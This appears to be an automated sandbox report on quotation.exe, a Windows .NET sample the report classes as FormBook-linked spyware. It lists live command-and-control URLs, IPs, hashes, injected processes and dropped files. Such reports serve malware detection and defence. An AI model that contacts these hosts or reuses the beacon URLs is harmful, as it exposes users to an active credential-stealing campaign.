                                                      http://www.taxitayninh365.site/ydza/?PLpD=YQDMT/cjjLIrhYhTk0Qcn1c+4/vXTHer2WGK9Y1kX6vo8j7CWoL4SlIzIlGkR2TnTHSV+ODB3q8FGPL6osY1BIA0voRLPdIJFDITNJjOTEnO/NX/dE7RBJTjciFlPthnKg==&dfxXf=5pgPlrExEjtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.phoenix88.sbs/ogj2/?PLpD=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/psKw0iImlr8MkKngr/ag9vs3m2iCqBOJ8/g5hlN9cY7ZSSO0fgv4aLrmeCdeR22hUyiHphs3+UPMeFnjEXz3Vw==&dfxXf=5pgPlrExEjtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.acc888ommodate.xyz/j1io/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.canadavinreport.site/4d2l/?PLpD=ZGBp9LUVeZbORoknng5+oWd+FfSafw9B5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMD88Lp4PQNylErUlYa6FSt3/cQZlayrlv3UKLh53gU+l17w==&dfxXf=5pgPlrExEjtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.nb-shenshi.buzz/qrcg/?PLpD=1fKHCnrcuLb+woCu5SHdUNHs45cyPNHAmKr2RbCfVfhm3PNz+rp77RggAVXwPiu1rMLErXVWwt2AmyUPU1kZHbinTcvoliy7Dmh5Jg4zqF2ez6vORVKEMmKyq03H3aWHiQ==&dfxXf=5pgPlrExEjtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.rtpmesinkoin.click/fsgl/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.5tuohbpzyj9.buzz/abgi/?PLpD=LosdeFxQ6b3v/d4SJ/OcJ/MY+PVZKDXZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flCIvo6AFeM2/skelSXUCscL7c+OC82gfnX3ulNzXIVMD/Pg==&dfxXf=5pgPlrExEjtrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.conseilnsaftogo.org/lqxd/?PLpD=wYwrhtOuglxnIn28LlpI4+LrVvqM62/DKK1NgpC20GbgYEDR8w6xmbtuhBCgj8a/1RMYy9cnrRcVYl1JPFOGzEFXxYAuHOIed0EYkcd0fYA++UMHJ9G8Ni1crzSH6uPj0A==&dfxXf=5pgPlrExEjtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.gadgetre.info/8q8w/?PLpD=oPmfzDvAiIeWP+dhDQf7HSaIzNrTwSyGpfszxH4jrRMMDKwng/5cFIiPa/6rGZsshFiqp6GKP0fVbj+TeZ8okB+i6TciPkxAVomi9Bq2BL+qGFtNXm3IZasYXFTCdN4piQ==&dfxXf=5pgPlrExEjtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.cortisalincontrol.net/cbfz/?PLpD=wkx2NXiTkimKkWVEm8IW4C4huKMmJZN5WgEr82Da3v6V9hQpjwkjAwPIlceTp9yKNyaCzMrAs840f3u2xWNXdTvTMZn4meFjRqcHxGrlREZ38HV0x/J+b0VjoEphiZZaRg==&dfxXf=5pgPlrExEjtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.canadavinreport.site/4d2l/true
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      http://www.cortisalincontrol.net/sk-logabpstatus.php?a=TWtMZ29kWWVvSVBIWGlFSGk5UEV4UFpDeUlmS21GbHVCUSearchProtocolHost.exe, 00000006.00000002.4521141897.0000000004C88000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://duckduckgo.com/chrome_newtabSearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.cortisalincontrol.net/px.js?ch=1SearchProtocolHost.exe, 00000006.00000002.4521141897.0000000004C88000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://dts.gnpge.comgkTgnrvdOG.exe, 00000007.00000002.4520585812.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/ac/?q=SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi?PLpD=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/SearchProtocolHost.exe, 00000006.00000002.4521141897.000000000418A000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.0000000002EDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoSearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.cortisalincontrol.net/px.js?ch=2SearchProtocolHost.exe, 00000006.00000002.4521141897.0000000004C88000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.litespeedtech.com/error-pageSearchProtocolHost.exe, 00000006.00000002.4521141897.0000000004964000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.00000000036B4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://conseilnsaftogo.org/lqxd/?PLpD=wYwrhtOuglxnIn28LlpI4SearchProtocolHost.exe, 00000006.00000002.4521141897.0000000004FAC000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.0000000003CFC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.conseilnsaftogo.orggkTgnrvdOG.exe, 00000007.00000002.4522340469.0000000004ADB000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.ecosia.org/newtab/SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ac.ecosia.org/autocomplete?q=SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.canadavinreport.site/4d2l/?PLpD=ZGBp9LUVeZbORoknng5SearchProtocolHost.exe, 00000006.00000002.4521141897.0000000003FF8000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.0000000002D48000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://localhost/arkanoid_server/requests.phpquotation.exe, 00000000.00000002.2082562762.0000000002D39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.strato.degkTgnrvdOG.exe, 00000007.00000002.4520585812.0000000003B6A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high

                                                                                World Map of Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public IPs

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                209.74.77.107
                                                                                		www.gadgetre.infoUnited States
                                                                                		31744MULTIBAND-NEWHOPEUStrue
                                                                                154.70.82.246
                                                                                		conseilnsaftogo.orgTogo
                                                                                		30982CAFENETTGtrue
                                                                                27.124.4.246
                                                                                		r0lqcud7.nbnnn.xyzSingapore
                                                                                		64050BCPL-SGBGPNETGlobalASNSGfalse
                                                                                88.99.61.52
                                                                                		phoenix88.sbsGermany
                                                                                		24940HETZNER-ASDEtrue
                                                                                208.91.197.27
                                                                                		www.cortisalincontrol.netVirgin Islands (BRITISH)
                                                                                		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                104.21.90.137
                                                                                		www.ana-silverco.shopUnited States
                                                                                		13335CLOUDFLARENETUStrue
                                                                                176.32.38.130
                                                                                		www.acc888ommodate.xyzRussian Federation
                                                                                		51659ASBAXETRUtrue
                                                                                217.160.0.200
                                                                                		carsten.studioGermany
                                                                                		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                156.232.181.155
                                                                                		www.5tuohbpzyj9.buzzSeychelles
                                                                                		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                                103.75.185.22
                                                                                		taxitayninh365.siteViet Nam
                                                                                		63762VNBOOKING-AS-VNVietNamBookingcorporationVNtrue
                                                                                155.94.253.4
                                                                                		rtpmesinkoin.clickUnited States
                                                                                		8100ASN-QUADRANET-GLOBALUStrue
                                                                                185.27.134.206
                                                                                		www.canadavinreport.siteUnited Kingdom
                                                                                		34119WILDCARD-ASWildcardUKLimitedGBfalse
                                                                                161.97.168.245
                                                                                		www.nb-shenshi.buzzUnited States
                                                                                		51167CONTABODEfalse

                                                                                General Information

                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1567392
                                                                                Start date and time:2024-12-03 14:12:19 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 10m 54s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:8
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:2
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:quotation.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@7/2@16/13
                                                                                EGA Information:
                                                                                • Successful, ratio: 75%
                                                                                HCA Information:
                                                                                • Successful, ratio: 86%
                                                                                • Number of executed functions: 79
                                                                                • Number of non-executed functions: 282
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                Warnings

                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • VT rate limit hit for: quotation.exe

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                08:13:09API Interceptor1x Sleep call for process: quotation.exe modified
                                                                                08:14:20API Interceptor9704643x Sleep call for process: SearchProtocolHost.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                209.74.77.107Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • www.beyondfitness.live/fbpt/
                                                                                specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • www.gadgetre.info/8q8w/
                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                • www.learnwithus.site/alu5/
                                                                                ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • www.gadgetre.info/8q8w/
                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                • www.learnwithus.site/alu5/
                                                                                Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                • www.beyondfitness.live/fbpt/
                                                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                • www.learnwithus.site/alu5/
                                                                                154.70.82.246specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • www.conseilnsaftogo.org/lqxd/
                                                                                ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • www.conseilnsaftogo.org/lqxd/
                                                                                https://d.agkn.com/pixel/10751/?che=1680529529190&ip=146.70.117.118&l1=http://7pnnyuzt.jirehsolux.com?ZGFyeWxAaGVhbHRoZXN5c3RlbXMuY29tGet hashmaliciousUnknownBrowse
                                                                                • 7pnnyuzt.jirehsolux.com/?ZGFyeWxAaGVhbHRoZXN5c3RlbXMuY29t
                                                                                27.124.4.246BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                                • www.laohub10.net/36be/
                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                • www.laohub10.net/sgdd/
                                                                                purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                • www.laohub10.net/sgdd/
                                                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                • www.laohub10.net/sgdd/

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                r0lqcud7.nbnnn.xyzYH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                                • 23.225.159.42
                                                                                Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                • 202.79.161.151
                                                                                lKvXJ7VVCK.exeGet hashmaliciousFormBookBrowse
                                                                                • 23.225.159.42
                                                                                BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                                • 27.124.4.246
                                                                                specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 23.225.159.42
                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                • 202.79.161.151
                                                                                ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 202.79.161.151
                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                • 27.124.4.246
                                                                                REQUESTING FOR UPDATED SOA.exeGet hashmaliciousFormBookBrowse
                                                                                • 23.225.160.132
                                                                                PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                • 23.225.160.132
                                                                                www.acc888ommodate.xyzspecifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 176.32.38.130
                                                                                ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 176.32.38.130
                                                                                Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                • 176.32.38.130

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                MULTIBAND-NEWHOPEUSProforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.77.109
                                                                                Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 209.74.77.107
                                                                                specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 209.74.64.187
                                                                                Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.77.108
                                                                                specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 209.74.77.107
                                                                                A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.77.109
                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.77.107
                                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.77.108
                                                                                ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 209.74.77.107
                                                                                Payment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 209.74.77.108
                                                                                BCPL-SGBGPNETGlobalASNSGProforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                • 202.79.161.151
                                                                                BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                                • 27.124.4.246
                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                • 202.79.161.151
                                                                                arm5.elfGet hashmaliciousUnknownBrowse
                                                                                • 180.215.169.147
                                                                                ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 202.79.161.151
                                                                                jmhgeojeri.elfGet hashmaliciousUnknownBrowse
                                                                                • 143.92.41.12
                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                • 27.124.4.246
                                                                                purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                • 27.124.4.246
                                                                                http://wwwfucai13.ccGet hashmaliciousUnknownBrowse
                                                                                • 143.92.58.241
                                                                                Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                                • 202.79.161.151
                                                                                CAFENETTGsora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                • 80.248.76.187
                                                                                specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 154.70.82.246
                                                                                ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 154.70.82.246
                                                                                sora.x86-20240504-0115.elfGet hashmaliciousMiraiBrowse
                                                                                • 80.248.76.190
                                                                                Y98pGn3FUt.elfGet hashmaliciousMiraiBrowse
                                                                                • 80.248.76.172
                                                                                WeKOvoISwM.elfGet hashmaliciousMiraiBrowse
                                                                                • 80.248.76.176
                                                                                F9eqjesWZR.elfGet hashmaliciousMiraiBrowse
                                                                                • 80.248.76.143
                                                                                arm7-20240101-1250.elfGet hashmaliciousMiraiBrowse
                                                                                • 80.248.76.163
                                                                                o8bI79fBhK.elfGet hashmaliciousMiraiBrowse
                                                                                • 80.248.76.173
                                                                                sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                • 80.248.76.140
                                                                                HETZNER-ASDEhttps://chargeview.liveGet hashmaliciousUnknownBrowse
                                                                                • 78.46.0.148
                                                                                https://es.vecteezy.com/arte-vectorial/20279878-kyd-letra-logo-diseno-en-blanco-antecedentes-kyd-creativo-circulo-letra-logo-concepto-kyd-letra-disenoGet hashmaliciousUnknownBrowse
                                                                                • 116.202.167.133
                                                                                INTRUM65392.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                • 94.130.137.154
                                                                                SearchUII.exeGet hashmaliciousUnknownBrowse
                                                                                • 136.243.111.71
                                                                                SearchUII.exeGet hashmaliciousUnknownBrowse
                                                                                • 136.243.111.71
                                                                                Intrum618267.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                • 94.130.137.154
                                                                                mtbkkesfthae.exeGet hashmaliciousVidarBrowse
                                                                                • 94.130.210.71
                                                                                tDLozbx48F.exeGet hashmaliciousGurcu StealerBrowse
                                                                                • 168.119.121.16
                                                                                mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 188.34.159.154
                                                                                x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 135.181.174.44

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\quotation.exe.log

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\quotation.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1216
                                                                                Entropy (8bit):5.34331486778365
                                                                                Encrypted:false
                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                Malicious:true
                                                                                Reputation:high, very likely benign file
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                C:\Users\user\AppData\Local\Temp\sE716IK71M

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                Category:dropped
                                                                                Size (bytes):196608
                                                                                Entropy (8bit):1.121297215059106
                                                                                Encrypted:false
                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):7.778398726761302
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                File name:quotation.exe
                                                                                File size:814'592 bytes
                                                                                MD5:fb56fbfa78c904b961a8db42b7ac648d
                                                                                SHA1:a4400e1e8e97fec1a68290b24aea4250189610ef
                                                                                SHA256:c8135636799971efa2fe543c693f96ab2238d38b140d1da6a07727231161a765
                                                                                SHA512:417465566d93bdcd35edfc7819c0522f1294f3029b9bc00e9f0d82ec7c913208832bc2fd6f202bde9357e938a61260756592dd1315f75f39ae5f04faf54de7fe
                                                                                SSDEEP:24576:iNIeecHJa3Javd4xS6a7VrG8nAFsOEXZmyI:sBecHJKavX7ViEXZ7
                                                                                TLSH:A905F19C3605B54FC947C6318FA4ED74AA546DEEA70683039AD71EEFF82D856CE040E2
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ng..............0......P......N:... ...@....@.. ....................................@................................

                                                                                File Icon

                                                                                Icon Hash:033424c4c199d839

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x4c3a4e
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x674EA3B6 [Tue Dec 3 06:22:46 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
